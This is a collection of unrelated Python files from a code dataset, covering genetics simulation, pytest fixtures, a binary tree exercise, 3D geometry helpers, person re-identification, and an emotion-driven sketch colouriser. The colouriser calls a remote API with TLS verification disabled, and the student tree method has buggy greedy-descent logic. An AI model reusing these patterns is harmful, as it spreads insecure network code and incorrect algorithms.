'.join([f\"'{conversation_id}'\" for conversation_id in conversation_ids])\n return formatted_conversation_ids\n","repo_name":"martin-nhs/ehr-deletion-lambda","sub_path":"services/database_service.py","file_name":"database_service.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1717090759","text":"import numpy as np\nimport scipy.stats as stat\nimport sklearn.linear_model as lm\nimport matplotlib.pyplot as plt\n\n\neps = .0001\ntau = .01\n\nN_genes = 100\nN_population = 100000\n\ndef runExperiment(seed):\n rng = np.random.default_rng(seed)\n betas_true = rng.normal(size=N_genes)\n genes_latent = rng.multivariate_normal(np.zeros(N_genes),np.eye(N_genes),\n size=N_population)\n\n quants = np.quantile(genes_latent,1-eps,axis=0)\n\n genes = 1*(genes_latent>quants)\n\n liability_latent = np.dot(genes,betas_true)\n liability_latent_scaled = liability_latent/np.std(liability_latent)\n liability = np.sqrt(1-.2)*liability_latent_scaled + np.sqrt(.2)*rng.normal(size=N_population)\n\n quant_liab = np.quantile(liability,1-tau)\n has_disease = 1.*(liability>quant_liab)\n\n model = lm.LogisticRegression()\n model.fit(genes,has_disease)\n return betas_true,model.coef_\n\ntrial1_true,trial1_learned = runExperiment(1993)\ntrial2_true,trial2_learned = runExperiment(1990)\ntrial3_true,trial3_learned = runExperiment(2021)\ntrial4_true,trial4_learned = runExperiment(2022)\ntrial5_true,trial5_learned = runExperiment(2023)\ntrial6_true,trial6_learned = runExperiment(2024)\ntrial7_true,trial7_learned = runExperiment(2025)\nfs1 = 20\nfs2 = 24\nfs3 = 16\nplt.scatter(trial1_true,trial1_learned,c='deeppink',alpha=.8,label='Trial 1')\nplt.scatter(trial2_true,trial2_learned,c='dodgerblue',alpha=.8,label='Trial 2')\nplt.scatter(trial3_true,trial3_learned,c='gold',alpha=.8,label='Trial 3')\nplt.scatter(trial4_true,trial4_learned,c='lime',alpha=.8,label='Trial 4')\nplt.scatter(trial5_true,trial5_learned,c='indigo',alpha=.8,label='Trial 5')\nplt.scatter(trial6_true,trial6_learned,c='saddlebrown',alpha=.8,label='Trial 6')\nplt.scatter(trial7_true,trial7_learned,c='aqua',alpha=.8,label='Trial 7')\nplt.xlabel('Latent effect on liability',fontsize=fs1)\nplt.ylabel('Regression Coefficient',fontsize=fs1)\nplt.title('True vs estimated coefficients .0001',fontsize=fs2)\nplt.legend(loc='upper left',fontsize=fs3)\nplt.show()\n","repo_name":"bystrogenomics/bystro-science","sub_path":"Experiments/rare_variant/rare_disease_simulation2.py","file_name":"rare_disease_simulation2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71979525046","text":"# -*- coding: utf-8 -*-\nimport importlib\nimport json\nimport os.path\n\nimport jsonpickle\nimport pytest\n\nfrom fixture.application import Application\nfrom fixture.orm import ORMFixture\n\nfixture = None\ntarget = None\n\n\ndef load_config(file):\n global target\n if target is None:\n config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), file)\n with open(config_file, \"r\", encoding=\"utf-8\") as fp:\n target = json.load(fp)\n return target\n\n\n@pytest.fixture\ndef app(request):\n global fixture\n global target\n\n browser = request.config.getoption(\"--browser\")\n web_config = load_config(request.config.getoption(\"--target\"))['web']\n if fixture is None:\n fixture = Application(browser=browser, base_url=web_config['base_url'])\n else:\n if not 
fixture.is_valid():\n fixture = Application(browser=browser, base_url=web_config['base_url'])\n fixture.session.ensure_logged(username=web_config[\"username\"], password=web_config[\"password\"])\n return fixture\n\n\n@pytest.fixture(scope=\"session\")\ndef db(request):\n db_config = load_config(request.config.getoption(\"--target\"))[\"db\"]\n dbfixture = ORMFixture(host=db_config[\"host\"], database=db_config[\"database\"], user=db_config[\"user\"], password=db_config[\"password\"])\n return dbfixture\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef stop(request):\n def fin():\n fixture.session.ensure_logged(None)\n fixture.destroy()\n\n request.addfinalizer(fin)\n return fixture\n\n\n@pytest.fixture\ndef check_ui(request):\n return request.config.getoption(\"--check_ui\")\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\", action=\"store\", default=\"chrome\")\n parser.addoption(\"--target\", action=\"store\", default=\"target.json\")\n parser.addoption(\"--check_ui\", action=\"store_true\")\n\n\ndef pytest_generate_tests(metafunc):\n for fixture in metafunc.fixturenames:\n if fixture.startswith(\"data_\"):\n testdata = load_form_module(fixture[5:])\n metafunc.parametrize(fixture, testdata, ids=[str(x) for x in testdata])\n elif fixture.startswith(\"json_\"):\n testdata = load_from_json(fixture[5:])\n metafunc.parametrize(fixture, testdata, ids=[str(x) for x in testdata])\n\n\ndef load_form_module(module):\n return importlib.import_module(f\"data.{module}\").testdata\n\n\ndef load_from_json(filename):\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), f\"data/{filename}.json\"), \"r\",\n encoding=\"utf-8\") as fp:\n return jsonpickle.decode(fp.read())\n\n\n@pytest.fixture\ndef x():\n \"\"\"пустая фикстура, чтобы закомментированная параметризация не ломала ран\"\"\"\n return 0\n","repo_name":"brammator/training_b19","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22334614588","text":"# ListBinaryTree class\r\n#\r\n# CSC148 Fall 2014, University of Toronto\r\n# Instructor: David Liu\r\n# ---------------------------------------------\r\n# STUDENT INFORMATION\r\n#\r\n# List your information below, in format\r\n# , \r\n# Yan Zeng, zengyan\r\n# ---------------------------------------------\r\n\r\n\r\nclass ListBinaryTree:\r\n def __init__(self, items):\r\n \"\"\" (ListBinaryTree, list) -> NoneType\r\n\r\n Create a complete binary tree in list form\r\n with the specified items.\r\n\r\n The [None] is used to start indexing items at 1\r\n instead of 0, which is easier.\r\n \"\"\"\r\n\r\n self.items = [None] + items\r\n\r\n def is_empty(self):\r\n \"\"\" (ListBinaryTree) -> bool\r\n Return True if self is empty.\r\n \"\"\"\r\n return len(self.items) == 1\r\n\r\n def root(self):\r\n \"\"\" (ListBinaryTree) -> object\r\n\r\n Return the root item of the tree.\r\n If the tree is empty, raise IndexError.\r\n \"\"\"\r\n\r\n if self.is_empty():\r\n raise IndexError\r\n else:\r\n return self.items[1]\r\n\r\n def go_down_greedy(self, index=1):\r\n \"\"\" (ListBinaryTree) -> list\r\n\r\n Return a list of items starting at the node with position index\r\n and ending at a leaf, where at each level the child node\r\n with the smaller value is chosen to recurse on\r\n (in case of ties, choose the left child).\r\n\r\n By default, the list starts at the root of the tree.\r\n\r\n Note: you may use either the provided 
subtree methods,\r\n or do the index arithmetic yourself.\r\n For maximum learning, try both!\r\n \"\"\"\r\n if index > len(self.items):\r\n return []\r\n else:\r\n lst = [self.items[index]]\r\n lft = 2 * index\r\n rit = 2 * index + 1\r\n if lft >= len(self.items) and rit >=len(self.items):\r\n return lst\r\n elif rit < len(self.items):\r\n return lst + self.go_down_greedy(rit)\r\n elif lft < len(self.items):\r\n return lst + self.go_down_greedy(lft)\r\n elif self.items[lft] < self.items[rit]:\r\n return lst + self.go_down_greedy(lft)\r\n else:\r\n return lst + self.go_down_greedy(rit) \r\n \r\n \r\n \r\n\r\n # Index helper functions\r\n def left(index):\r\n \"\"\" (int) -> int\r\n\r\n Return the index of the left child of the node as position index.\r\n \"\"\"\r\n return 2 * index\r\n\r\n def right(index):\r\n \"\"\" (int) -> int\r\n\r\n Return the index of the right child of the node as position index.\r\n \"\"\"\r\n return 2 * index + 1\r\n","repo_name":"20yvette/CSC148","sub_path":"CSC148/Exercise/e8/list_binary_tree.py","file_name":"list_binary_tree.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5882499410","text":"import trimesh\nimport os\nimport json\nimport numpy as np\nimport torch\nfrom shapely.geometry.polygon import Polygon, LineString, Point\n\nAABBcache = {}\nASPECT = 16 / 9\nwith open('./dataset/objCatListAliv2.json') as f:\n objCatList = json.load(f)\n\n# code is from https://github.com/mikedh/trimesh/issues/507\ndef as_mesh(scene_or_mesh):\n \"\"\"\n Convert a possible scene to a mesh.\n If conversion occurs, the returned mesh has only vertex and face data.\n \"\"\"\n if isinstance(scene_or_mesh, trimesh.Scene):\n if len(scene_or_mesh.geometry) == 0:\n mesh = None # empty scene\n else:\n # we lose texture information here\n mesh = trimesh.util.concatenate(\n tuple(trimesh.Trimesh(vertices=g.vertices, faces=g.faces)\n for g in scene_or_mesh.geometry.values()))\n else:\n # assert(isinstance(mesh, trimesh.Trimesh))\n mesh = scene_or_mesh\n return mesh\n\ndef load_AABB(i):\n if i in AABBcache:\n return AABBcache[i]\n if os.path.exists(f'./dataset/object/{i}/{i}-AABB.json'):\n try:\n with open(f'./dataset/object/{i}/{i}-AABB.json') as f:\n AABBcache[i] = json.load(f)\n return AABBcache[i]\n except json.decoder.JSONDecodeError as e:\n print(e)\n mesh = as_mesh(trimesh.load(f'./dataset/object/{i}/{i}.obj'))\n AABB = {}\n AABB['max'] = [0,0,0]\n AABB['min'] = [0,0,0]\n AABB['max'][0] = np.max(mesh.vertices[:, 0]).tolist()\n AABB['max'][1] = np.max(mesh.vertices[:, 1]).tolist()\n AABB['max'][2] = np.max(mesh.vertices[:, 2]).tolist()\n AABB['min'][0] = np.min(mesh.vertices[:, 0]).tolist()\n AABB['min'][1] = np.min(mesh.vertices[:, 1]).tolist()\n AABB['min'][2] = np.min(mesh.vertices[:, 2]).tolist()\n with open(f'./dataset/object/{i}/{i}-AABB.json', 'w') as f:\n json.dump(AABB, f)\n AABBcache[i] = AABB\n return AABBcache[i]\n\ndef getWallHeight(meshPath):\n mesh = as_mesh(trimesh.load(meshPath))\n return np.max(mesh.vertices[:, 1]).tolist()\n\ndef getMeshVertices(methPath):\n mesh = as_mesh(trimesh.load(meshPath))\n return mesh.vertices\n\ndef objectInDataset(modelId):\n if os.path.exists(f'./dataset/object/{modelId}/'):\n return True\n else:\n return False\n\ndef jsonDumpsDefault(obj):\n if type(obj).__module__ == np.__name__:\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return obj.item()\n raise TypeError('Unknown type:', type(obj))\n\n'''\n:param 
point: the given point in a 3D space\n:param translate: the translation in 3D\n:param angle: the rotation angle on XOZ plain\n:param scale: the scale in 3D\n'''\ndef transform_a_point(point, translate, angle, scale):\n result = point.copy()\n scaled = point.copy()\n scaled = point * scale\n result[0] = np.cos(angle) * scaled[0] + np.sin(angle) * scaled[2]\n result[2] = -np.sin(angle) * scaled[0] + np.cos(angle) * scaled[2]\n return result + translate\n\ndef isLineIntersectsWithEdges(line, floorMeta):\n for i in range(floorMeta.shape[0]):\n l = LineString((floorMeta[i][0:2], floorMeta[(i+1)%floorMeta.shape[0]][0:2]))\n if line.crosses(l):\n return True\n return False\n\ndef pointToLineDistance(point, p1, p2):\n return np.linalg.norm(np.cross(p2-p1, p1-point)) / np.linalg.norm(p2-p1)\n\ndef isPointBetweenLineSeg(point, p1, p2):\n s = np.dot(p2 - p1, point - p1) / np.linalg.norm(p2 - p1)\n if 0 < s and s < np.linalg.norm(p2 - p1):\n return True\n else:\n return False\n\n# https://stackoverflow.com/questions/21037241/how-to-determine-a-point-is-inside-or-outside-a-cube\ndef inside_test(points , cube3d):\n \"\"\"\n cube3d = numpy array of the shape (8,3) with coordinates in the clockwise order. first the bottom plane is considered then the top one.\n points = array of points with shape (N, 3).\n\n Returns the indices of the points array which are outside the cube3d\n \"\"\"\n b1,b2,b3,b4,t1,t2,t3,t4 = cube3d\n\n dir1 = (t1-b1)\n size1 = np.linalg.norm(dir1)\n dir1 = dir1 / size1\n\n dir2 = (b2-b1)\n size2 = np.linalg.norm(dir2)\n dir2 = dir2 / size2\n\n dir3 = (b4-b1)\n size3 = np.linalg.norm(dir3)\n dir3 = dir3 / size3\n\n cube3d_center = (b1 + t3)/2.0\n\n dir_vec = points - cube3d_center\n\n res1 = np.where( (np.absolute(np.dot(dir_vec, dir1)) * 2) > size1 )[0]\n res2 = np.where( (np.absolute(np.dot(dir_vec, dir2)) * 2) > size2 )[0]\n res3 = np.where( (np.absolute(np.dot(dir_vec, dir3)) * 2) > size3 )[0]\n\n return list( set().union(res1, res2, res3) )\n\ndef pointProjectedToPlane(p, normal, startPoint):\n normal = normal / np.linalg.norm(normal)\n distanceToPlane = -np.dot(p - startPoint, normal)\n projectedP = p + distanceToPlane * normal\n return projectedP\n\ndef rogrigues(v, k, theta):\n # returns v_rot. \n return v * np.cos(theta) + np.cross(k, v) * np.sin(theta)\n\ndef rayCastsAABBs(probe, direction, objList):\n \"\"\"\n Note that before calling this api, all the objects should have corresponding AABB. 
\n \"\"\"\n res = []\n for o in objList:\n if not objectInDataset(o['modelId']):\n continue\n probeToO = np.array(o['AABB']['center']) - probe\n magnitute = np.dot(probeToO, direction) / np.linalg.norm(direction)\n if magnitute <= 0:\n continue\n nP = probe + magnitute * (direction / np.linalg.norm(direction))\n if len(inside_test(nP.reshape(1, 3), o['AABB']['eightPoints'])) == 0:\n res.append({\n 'obj': o,\n 'dis': magnitute,\n })\n res.sort(key=lambda x : x['dis'])\n return res\n\ndef roomDiameter(floorMeta):\n floorMeta = floorMeta[:, 0:2]\n return np.max(np.linalg.norm(floorMeta[:, None, :] - floorMeta, axis=2))\n\nimport threading\nclass BaseThread(threading.Thread):\n def __init__(self, method_args=None, callback=None, callback_args=None, *args, **kwargs):\n target = kwargs.pop('target')\n super(BaseThread, self).__init__(target=self.target_with_callback, *args, **kwargs)\n self.method_args = method_args\n self.callback = callback\n self.method = target\n self.callback_args = callback_args\n\n def target_with_callback(self):\n self.method(*self.method_args)\n if self.callback is not None:\n self.callback(*self.callback_args)\n\ndef getobjCat(modelId):\n if modelId in objCatList:\n if len(objCatList[modelId]) > 0:\n return objCatList[modelId][0]\n else:\n return \"Unknown Category\"\n else:\n return \"Unknown Category\"\n\ndef rotate_pos_prior(points, angle):\n result = points.clone()\n result[:, 0] = torch.cos(angle) * points[:, 0] + torch.sin(angle) * points[:, 2]\n result[:, 2] = -torch.sin(angle) * points[:, 0] + torch.cos(angle) * points[:, 2]\n return result\n\ndef rotate_bb_local_para(points, angle, scale):\n result = points.clone()\n scaled = points.clone()\n scaled = scaled * scale\n result[:, 0] = torch.cos(angle) * scaled[:, 0] + torch.sin(angle) * scaled[:, 1]\n result[:, 1] = -torch.sin(angle) * scaled[:, 0] + torch.cos(angle) * scaled[:, 1]\n return result\n","repo_name":"slothfulxtx/3DScenePlatform","sub_path":"sk.py","file_name":"sk.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"3757361612","text":"# ------------------------------\n# Raymond Ng\n# NUS ISS Internship project 2020\n#\n# Code is adapted from : https://github.com/KaiyangZhou/deep-person-reid\n# ------------------------------\n\nimport os\nimport cv2\nimport time\nimport torch\nimport numpy as np\nimport torchreid\nfrom torch.autograd import Variable\nfrom torchvision import transforms, models\nfrom PIL import Image\n\ndef image_loader(loader, image_name, fromcv2=False):\n if fromcv2:\n image = cv2.resize(image_name, (128,256)) \n image = Image.fromarray(image_name) # Convert to PIL\n else:\n image = Image.open(image_name)\n image = loader(image).float()\n image = image.clone().detach().requires_grad_(True)\n image = image.unsqueeze(0)\n return image\n\ndef fliplr(img, device):\n '''flip horizontal'''\n inv_idx = torch.arange(img.size(3)-1,-1,-1).long().to(device=device) # N x C x H x W\n img_flip = img.index_select(3,inv_idx)\n return img_flip\n\nclass DeepPersonReID:\n def __init__(self, model, weights_path, threshold, device='cpu', verbose=False):\n self.device = torch.device(device)\n self.verbose = verbose\n self.threshold = threshold\n self.model = torchreid.models.build_model(name=model, num_classes=1041).to(self.device)\n torchreid.utils.load_pretrained_weights(self.model, weights_path)\n self.model.eval()\n self.transforms = transforms.Compose([\n transforms.Resize((256,128), interpolation=3),\n 
transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n \n def extract_features(self, images):\n '''\n Method to extract features by the ReID model\n '''\n features = torch.FloatTensor().to(device=self.device)\n for image in images:\n try:\n img = image_loader(self.transforms, image, True).to(device=self.device)\n except:\n continue\n ff = torch.FloatTensor(1, 512).zero_().to(device=self.device)\n for i in range(2):\n if (i == 1):\n img = fliplr(img, self.device)\n input_img = Variable(img).to(device=self.device)\n output = self.model(input_img)\n ff += output\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)\n ff = ff.div(fnorm.expand_as(ff))\n features = torch.cat((features, ff.data.to(device=self.device)), 0)\n return features\n \n def reid(self, qfeat, gfeat):\n '''\n Method to generate ReID score\n '''\n qScore_idx = {}\n for qidx in range(len(qfeat)):\n qf = qfeat[qidx]\n query = qf.view(-1,1)\n score = torch.mm(gfeat, query)\n score = score.squeeze(1).cpu()\n score = score.numpy()\n\n index = np.argsort(score)\n index = index[::-1]\n best_gindex = None\n best_gscore = 0.0\n # Use index[0] here to get the highest scoring index after argsort\n if score[index[0]] > self.threshold:\n qScore_idx[qidx] = index[0]\n best_gindex = index[0]\n best_gscore = score[index[0]]\n\n if self.verbose:\n outtxt = f'Query[{qidx}]\\n'\n for sidx in range(len(score)):\n outtxt += f' Gallery[{sidx}]: ({score[sidx]:.2f})'\n print(outtxt)\n print(f'Best Gallery Index [{best_gindex}], Score ({best_gscore:.2f})\\n')\n return qScore_idx\n\n# FOR DEBUG\n# if __name__ == '__main__':\n # parser = argparse.ArgumentParser(prog='DeepPersonReID.py')\n # parser.add_argument('-qv', '--qvideos-path', type=str, default='video', help='Path to query videos')\n # parser.add_argument('-gv', '--gvideos-path', type=str, default='video', help='Path to gallery videos')\n # parser.add_argument('-s', '--save-vid', action='store_true', help='Save output videos')\n # args = parser.parse_args()\n\n # img = Image.open('35.png')\n # dpReID = DeepPersonReID(os.path.join('model','osnet_ain_x1_0_mars_softmax_cosinelr','model.pth.tar-150'), torch.device('cuda'))\n # print(dpReID.extract_features(['35.png']))\n","repo_name":"raymondng76/NUS-ISS-Internship","sub_path":"ReID/DeepPersonReID/DeepPersonReID.py","file_name":"DeepPersonReID.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"33439919130","text":"#!/usr/bin/python3\n\nfrom bisect import bisect_left, bisect_right\n\n#------------------------------ /!\\ --------------------------------\n# V, x and t can be ignored since the disrupt zone is infinite on X\n#-------------------------------------------------------------------\n\nSEGMENT=100\nN, Q, V = map(int, input().split(\" \"))\n\nposlist = []\nfreqlist = []\ncumfreq = {}\nfor i in range(N):\n x, y, f = map(int, input().split(\" \"))\n poslist.append(y)\n freqlist.append(f)\n cumfreq[f] = 0\n\n# separate into unique and duplicated frequencies\nfreqcount = {}\nfor i in range(len(poslist)):\n if freqlist[i] in freqcount:\n freqcount[freqlist[i]].append(poslist[i])\n else:\n freqcount[freqlist[i]] = [poslist[i]]\n \nuniqposlist = []\ndupfreqlist = []\ndupposlist = []\ndupaccum = []\nfor freq, pos in freqcount.items():\n if len(pos) == 1:\n uniqposlist += pos\n else:\n dupposlist += pos\n dupfreqlist += [freq for i in range(len(pos))]\n dupaccum += [None for i in range(len(pos))]\n \n# 
sort\nuniqposlist = sorted(uniqposlist)\nif len(dupposlist) > 0:\n dupposlist, dupfreqlist = map(list, zip(*sorted(zip(dupposlist, dupfreqlist)))) # sort both by pos\n\n# accumulate at every segment\nfreqcount = {}\nfor i in range(len(dupposlist)):\n if i % SEGMENT == 0:\n dupaccum[i] = dict(freqcount)\n if dupfreqlist[i] in freqcount:\n freqcount[dupfreqlist[i]] += 1\n else:\n freqcount[dupfreqlist[i]] = 1\n# last accumulation with the total accumulation\ndupaccum.append(dict(freqcount))\n \n# solve\nfor q in range(Q):\n yu, yd, t = map(int, input().split(\" \"))\n \n # retrieve the max duplicated freq\n idxd = bisect_left(dupposlist, yd)\n idxu = bisect_right(dupposlist, yu)\n \n # calculate the accumulation at idxd and idxu from last segments\n dsegment = (idxd // SEGMENT) * SEGMENT\n daccum = dict(dupaccum[dsegment])\n for i in range(dsegment, idxd):\n if dupfreqlist[i] in daccum:\n daccum[dupfreqlist[i]] += 1\n else:\n daccum[dupfreqlist[i]] = 1\n \n usegment = (idxu // SEGMENT) * SEGMENT\n uaccum = dict(dupaccum[usegment])\n for i in range(usegment, idxu):\n if dupfreqlist[i] in uaccum:\n uaccum[dupfreqlist[i]] += 1\n else:\n uaccum[dupfreqlist[i]] = 1\n\n # compute the maximum freq\n maxi = 0\n for freq, count in uaccum.items():\n if freq in daccum.keys():\n if maxi < count - daccum[freq]:\n maxi = count - daccum[freq]\n else:\n if maxi < count:\n maxi = count\n if maxi > 0:\n print(maxi)\n elif bisect_left(uniqposlist, yd) != bisect_right(uniqposlist, yu):\n print(1)\n else:\n print(0)\n","repo_name":"N3mesis98/HackerRank","sub_path":"Starfleet/starfleet.py","file_name":"starfleet.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11175800569","text":"# _*_ coding:utf-8 _*_ \n\nimport csv\n\ndata = [\n ( '0011' , 'http://www.59store.com/' , '59store.com' ),\n ( '0022' , 'http://59data.top/' , '59data.top' ),\n ( '0033' , 'http://my.space.zmx/' , 'hзгyДaЃП' )\n]\n\nwith open('csvtest.csv', 'wb') as csvfile:\n\twriter = csv.writer(csvfile, dialect='excel')\n\twriter.writerow(['id', 'url', 'keywords'])\n\twriter.writerows(data)","repo_name":"yangwii/PythonLearn","sub_path":"csv_write.py","file_name":"csv_write.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20227134161","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('index', '0004_auto_20161210_0750'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='tours',\n name='startaddress',\n field=models.CharField(default='Ho Chi Minh', max_length=100),\n ),\n ]\n","repo_name":"vuonghungvinh/thuc_tap_web","sub_path":"index/migrations/0005_tours_startaddress.py","file_name":"0005_tours_startaddress.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72334617844","text":"import numpy as np\nimport cv2\nfrom keras.preprocessing import image\nfrom time import time\nimport imageio\nimport scipy.ndimage\nimport requests\nimport json\nfrom PIL import Image, ImageDraw, ImageFilter\nimport matplotlib.pyplot as plt\nimport base64\nfrom io import BytesIO\n\nimport urllib3\n\nurllib3.disable_warnings()\n\n\n# -----------------------------\n# open cv initialization\ndef main():\n time_last_call = 
time()\n\n face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n\n cap = cv2.VideoCapture(0)\n # -----------------------------\n # face expression recognizer initialization\n from keras.models import model_from_json\n model = model_from_json(open(\"facial_expression_model_structure.json\", \"r\").read())\n model.load_weights('facial_expression_model_weights.h5') # load weights\n\n # -----------------------------\n emotions = ('angry', 'disgust', 'fear', 'happy', 'sad', 'surprise', 'neutral')\n\n # pool = Pool(processes=1)\n\n # Traitement Image\n img_url = \"https://fineartamerica.com/images/artworkimages/medium/1/on-the-way-to-the-dance--celebrating-cinco-de-mayo-karla-horst.jpg\"\n # img_url = \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHfk89RY0vfgSmIWHVUNblxb9jwMzD1hf4WgtzNfRrUywzvWSs\"\n # img_url = \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR_sPl3nRo5bvTX85PYTr96EV9rsrmyoDEFGRUSDgprXoQnSXAi\"\n\n start_img = imageio.imread(img_url)\n\n # start_img.shape(196, 160, 30)\n\n gray_img = greyscale(start_img)\n\n inverted_img = 255 - gray_img\n\n blur_img = scipy.ndimage.filters.gaussian_filter(inverted_img, sigma=40)\n\n final_img = dodge(blur_img, gray_img)\n\n plt.imshow(final_img, cmap='gray')\n\n plt.imsave('./img/new_image.png', final_img, cmap='gray', vmin=0, vmax=255)\n\n # Create an image object\n\n image1 = Image.open(\"./img/new_image.png\")\n\n # Find the edges by applying the filter ImageFilter.FIND_EDGES\n\n # image_with_edges = (image1.filter(ImageFilter.EDGE_ENHANCE_MORE)).filter(ImageFilter.FIND_EDGES)\n\n # display the original show\n # inverted_image = PIL.ImageOps.invert(image_with_edges)\n\n sharpened = (image1.filter(ImageFilter.SMOOTH_MORE)).filter(ImageFilter.DETAIL).filter(ImageFilter.CONTOUR)\n\n image1 = sharpened\n\n image1.save(\"./img/new_image.png\")\n\n # display the new image with edge detection done\n\n while True:\n ret, img = cap.read()\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2) # draw rectangle to main image\n\n detected_face = img[int(y):int(y + h), int(x):int(x + w)] # crop detected face\n detected_face = cv2.cvtColor(detected_face, cv2.COLOR_BGR2GRAY) # transform to gray scale\n detected_face = cv2.resize(detected_face, (48, 48)) # resize to 48x48\n\n img_pixels = image.img_to_array(detected_face)\n img_pixels = np.expand_dims(img_pixels, axis=0)\n\n img_pixels /= 255 # pixels are in scale of [0, 255]. 
normalize all pixels in scale of [0, 1]\n\n predictions = model.predict(img_pixels) # store probabilities of 7 expressions\n\n # find max indexed array 0: angry, 1:disgust, 2:fear, 3:happy, 4:sad, 5:surprise, 6:neutral\n max_index = np.argmax(predictions[0])\n\n emotion = emotions[int(max_index)]\n\n # write emotion text above rectangle\n cv2.putText(img, emotion, (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)\n\n # call function every seconds\n if time_last_call + 10 < time():\n new_image(emotion, image1.size)\n # \"./ img / images.png\"\n\n display_image = cv2.imread('./img/images.png', 1)\n\n cv2.imshow('image', display_image)\n\n time_last_call = time()\n\n # process on detected face end\n # -------------------------\n\n cv2.imshow('img', img)\n\n if cv2.waitKey(1) & 0xFF == ord('q'): # press q to quit\n break\n\n # kill open cv things\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef greyscale(rgb): return np.dot(rgb[..., :3], [0.299, 0.587, 0.300])\n\n\ndef dodge(front, back):\n result = front * 300 / (300 - back)\n\n result[result > 255] = 255\n\n result[back == 255] = 255\n\n return result.astype('uint8')\n\n\ndef new_image(emotion, size):\n url = \"https://dvic.devinci.fr/dgx/paints_torch/api/v1/colorizer\"\n\n my_image = open('./img/new_image.png', 'rb')\n result_read = my_image.read()\n result_64_encode = base64.encodebytes(result_read)\n\n new_hint(size, emotion)\n\n hint = open('./img/hint.png', 'rb')\n hint_read = hint.read()\n hint_64_encode = base64.encodebytes(hint_read)\n\n json_data = json.dumps({\n 'sketch': result_64_encode.decode(\"utf-8\"),\n 'hint': hint_64_encode.decode(\"utf-8\"),\n 'opacity': 0\n })\n\n headers = {'Content-type': 'application/json; charset=utf-8', 'dataType': 'json'}\n\n # sending get request and saving the response as response object\n r = requests.post(url=url, data=json_data, headers=headers, verify=False)\n\n r.raise_for_status()\n\n json_response = r.json()\n\n img_data = base64.b64decode(json_response['colored'].split(\",\")[1])\n\n final_img = Image.open(BytesIO(img_data))\n\n final_img.save('./img/images.png', 'PNG')\n\n return final_img\n\n\ndef new_hint(size, emotion):\n hin = Image.new('RGBA', size, (255, 0, 0, 0))\n\n if 'angry' == emotion:\n\n main_color = (165, 31, 24)\n second_color = (255, 19, 7)\n third_color = (255, 97, 7)\n\n elif 'disgust' == emotion:\n\n main_color = (12, 147, 7)\n second_color = (14, 119, 77)\n third_color = (102, 130, 32)\n\n elif 'fear' == emotion:\n\n main_color = (114, 162, 181)\n second_color = (69, 98, 109)\n third_color = (121, 136, 142)\n\n elif 'happy' == emotion:\n\n main_color = (216, 45, 116)\n second_color = (255, 104, 167)\n third_color = (255, 183, 213)\n\n elif 'sad' == emotion:\n\n main_color = (132, 117, 145)\n second_color = (145, 117, 130)\n third_color = (124, 127, 127)\n\n elif 'surprise' == emotion:\n\n main_color = (237, 221, 104)\n second_color = (255, 230, 50)\n third_color = (249, 236, 139)\n\n else:\n hin.save('./img/hint.png', 'PNG')\n return\n\n draw = ImageDraw.Draw(hin)\n\n draw.line((size[0] / 3, size[1] / 4 + 4, size[0] / 3, size[1] / 4), fill=main_color, width=3)\n draw.line((size[0] / 3 * 2, size[1] / 4 + 4, size[0] / 3 * 2, size[1] / 4), fill=main_color, width=3)\n draw.line((size[0] / 3, size[1] / 4 * 2 + 4, size[0] / 3, size[1] / 4 * 2), fill=second_color, width=2)\n draw.line((size[0] / 3 * 2, size[1] / 4 * 2 + 4, size[0] / 3 * 2, size[1] / 4 * 2), fill=second_color, width=2)\n draw.line((size[0] / 3, size[1] / 4 * 3 + 4, size[0] / 3, size[1] / 4 * 
